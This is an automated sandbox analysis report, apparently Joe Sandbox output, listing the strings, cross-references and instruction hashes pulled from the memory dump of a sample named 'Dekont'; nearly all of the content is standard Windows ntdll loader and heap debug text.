                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                  • API String ID: 0-2368682639
                                  Strings
                                  • @, xrefs: 0104259B
                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01042624
                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01042412
                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010422E4
                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010424C0
                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0104261F
                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01042409
                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010425EB
                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01042498
                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01042506
                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01042602
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                  • API String ID: 0-4009184096
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                  • API String ID: 0-2515994595
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                  • API String ID: 0-1700792311
                                  Strings
                                  • VerifierFlags, xrefs: 01058C50
                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01058A67
                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01058A3D
                                  • HandleTraces, xrefs: 01058C8F
                                  • VerifierDebug, xrefs: 01058CA5
                                  • VerifierDlls, xrefs: 01058CBD
                                  • AVRF: -*- final list of providers -*- , xrefs: 01058B8F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01029A01
                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 010299ED
                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01029A2A
                                  • apphelp.dll, xrefs: 00FC6496
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01029A11, 01029A3A
                                  • LdrpInitShimEngine, xrefs: 010299F4, 01029A07, 01029A30
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010421BF
                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0104219F
                                  • RtlGetAssemblyStorageRoot, xrefs: 01042160, 0104219A, 010421BA
                                  • SXS: %s() passed the empty activation context, xrefs: 01042165
                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01042178
                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01042180
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                  Strings
                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 010481E5
                                  • LdrpInitializeImportRedirection, xrefs: 01048177, 010481EB
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0100C6C3
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01048181, 010481F5
                                  • Loading import redirection DLL: '%wZ', xrefs: 01048170
                                  • LdrpInitializeProcess, xrefs: 0100C6C4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                  APIs
                                    • Part of subcall function 01012DF0: LdrInitializeThunk.NTDLL ref: 01012DFA
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010BA3
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010BB6
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010D60
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01010D74
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                  • String ID:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                  Strings
                                  • @, xrefs: 01008591
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01008421
                                  • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0100855E
                                  • LdrpInitializeProcess, xrefs: 01008422
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010421D9, 010422B1
                                  • SXS: %s() passed the empty activation context, xrefs: 010421DE
                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010422B6
                                  • .Local, xrefs: 010028D8
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                  Strings
                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01043456
                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01043437
                                  • RtlDeactivateActivationContext, xrefs: 01043425, 01043432, 01043451
                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0104342A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                  Strings
                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 010310AE
                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01031028
                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0103106B
                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01030FE5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                  Strings
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01043640, 0104366C
                                  • LdrpFindDllActivationContext, xrefs: 01043636, 01043662
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0104365C
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0104362F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  Strings
                                  • apphelp.dll, xrefs: 00FF2462
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0103A9A2
                                  • LdrpDynamicShimModule, xrefs: 0103A998
                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0103A992
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • HEAP[%wZ]: , xrefs: 00FE3255
                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FE327D
                                  • HEAP: , xrefs: 00FE3264
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: $@
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FilterFullPath$UseFilter$\??\
                                  Strings
                                  • LdrpCheckModule, xrefs: 0103A117
                                  • minkernel\ntdll\ldrinit.c, xrefs: 0103A121
                                  • Failed to allocated memory for shimmed module list, xrefs: 0103A10F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                  Strings
                                  • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FCCD34
                                  • @, xrefs: 00FCCD63
                                  • InstallLanguageFallback, xrefs: 00FCCD7F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                  Strings
                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 010482DE
                                  • Failed to reallocate the system dirs string !, xrefs: 010482D7
                                  • minkernel\ntdll\ldrinit.c, xrefs: 010482E8
                                  Similarity
                                  • API ID:
                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                  Strings
                                  • @, xrefs: 0108C1F1
                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0108C1C5
                                  • PreferredUILanguages, xrefs: 0108C212
                                  Similarity
                                  • API ID:
                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                  Similarity
                                  • API ID:
                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                  Strings
                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01054899
                                  • LdrpCheckRedirection, xrefs: 0105488F
                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01054888
                                  Similarity
                                  • API ID:
                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                  Similarity
                                  • API ID:
                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                  Strings
                                  • LdrpInitializationFailure, xrefs: 010520FA
                                  • Process initialization failed with status 0x%08lx, xrefs: 010520F3
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01052104
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: #%u
                                  Strings
                                  • LdrResSearchResource Exit, xrefs: 00FDAA25
                                  • LdrResSearchResource Enter, xrefs: 00FDAA13
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                  Similarity
                                  • API ID:
                                  • String ID: `$`
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Legacy$UEFI
                                  Similarity
                                  • API ID:
                                  • String ID: @$MUI
                                  Strings
                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FD063D
                                  • kLsE, xrefs: 00FD0540
                                  Similarity
                                  • API ID:
                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                  Strings
                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 00FDA309
                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 00FDA2FB
                                  Similarity
                                  • API ID:
                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: Cleanup Group$Threadpool!
                                  Similarity
                                  • API ID:
                                  • String ID: MUI
                                  Similarity
                                  • API ID:
                                  • String ID: GlobalTags
                                  Similarity
                                  • API ID:
                                  • String ID: .mui
                                  Similarity
                                  • API ID:
                                  • String ID: EXT-
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryHash
                                  Similarity
                                  • API ID:
                                  • String ID: #
                                  Similarity
                                  • API ID:
                                  • String ID: BinaryName
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  Strings
                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0105895E
                                  Similarity
                                  • API ID:
                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dec2966e8c91bdac8b60d45dff3d1a0ad674bffe485f88b4eb695d43433d8f93
                                  • Instruction ID: 07876121fe99eb5c66d561e1b55b173eeba320195b416ab1ce5031f3a87f0bb7
                                  • Opcode Fuzzy Hash: dec2966e8c91bdac8b60d45dff3d1a0ad674bffe485f88b4eb695d43433d8f93
                                  • Instruction Fuzzy Hash: 38328F75A04205CFDB25CF68C480BAAB7F6FF88310F24856AE995EB351DB34E841DB50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction ID: 5070bc759092c745e22eec51813ccc59fc660377e75f08fa6d104425e76366f5
                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                  • Instruction Fuzzy Hash: 2AF18F71E0021D9BDB15CF99C880BBEBBF9AF88714F088169EA45AB351E774EC41DB50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 719cd12d2d5211b79c20d617896ed9704c6c5bd41559c6d0be1a547f807fdf2f
                                  • Instruction ID: 4625b4dd77928cfe9549b6f03afe0fd3f31b746c2f1e1ebf12feb95217fa3ed8
                                  • Opcode Fuzzy Hash: 719cd12d2d5211b79c20d617896ed9704c6c5bd41559c6d0be1a547f807fdf2f
                                  • Instruction Fuzzy Hash: 80D1E271A0070A8BEF15CF69C841AFEB7F9AF88314F18C16AD995E7241E735E905CB60
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 266655216387cc82c45ca279d7c93b5cd5967badecdba70c48d9379cfa0149b7
                                  • Instruction ID: 523f9840756d1d20a526d6b128e2a4dfe829b439170816d003d26bf876c14d8e
                                  • Opcode Fuzzy Hash: 266655216387cc82c45ca279d7c93b5cd5967badecdba70c48d9379cfa0149b7
                                  • Instruction Fuzzy Hash: 53E17D71908341CFC714CF28C590A6ABBE1FF99318F198A6EE895CB351DB31E905DB92
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 69ccc9665b6dcd425568b7508189bd7e901143d76a2801d6f7337c539ababfc6
                                  • Instruction ID: 0337c382b651bcc186c05ece8803aee8039a722082b860ed3eacb4825d82a9ab
                                  • Opcode Fuzzy Hash: 69ccc9665b6dcd425568b7508189bd7e901143d76a2801d6f7337c539ababfc6
                                  • Instruction Fuzzy Hash: 45D1D172A002179BCB14DF28CD82FBA77A5BF44354F14462DF956DB281EB38E942EB50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction ID: 3655229c06475e907b39ede0fa43667f7c4da3f64bd9929bd42b7203b02ff340
                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction Fuzzy Hash: 42B15374A006059FDBA4DF5AC940AAFBBF9FF84344F14845EAE8297791DA34E906CB10
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction ID: fa9cbb9e18561e72a29e9ee84a337e5a98a85b8cf8cbd76c74adf667927192fb
                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction Fuzzy Hash: 9DB14C316046859FDB21DB69C840BBEFBFAAF84300F284195E591DB391DB74ED81EB50
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6bb6a88b7d974c117480684930690699495aa4d116471edb4f9eaf631416c4f
                                  • Instruction ID: 161e8e75db2ab6365b5eaefee81f0daf02fa7e4b7be5b933c8f1ef461f56da7b
                                  • Opcode Fuzzy Hash: c6bb6a88b7d974c117480684930690699495aa4d116471edb4f9eaf631416c4f
                                  • Instruction Fuzzy Hash: 64C178715083418FD764CF18C484BABB7E9BF88344F48496EE98987390DB74E909CF92
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_fa0000_Dekont.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 59a1cb6ae739bb4bce0a2af609f31070aa81b8de0bd075f9cf248639498046ed
                                  • Instruction ID: acff1ca01fa19e1d7a86a504136bb6aaa6a172a4dbbd667aa57202ffb2bdce17
                                  • Opcode Fuzzy Hash: 59a1cb6ae739bb4bce0a2af609f31070aa81b8de0bd075f9cf248639498046ed
                                  • Instruction Fuzzy Hash: 42B19070A002668BDB64CF68C991BA9B3F1EF44710F1485EDE54EE7281EB34AD85DF60
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: true
                                  Joe Sandbox IDA Plugin
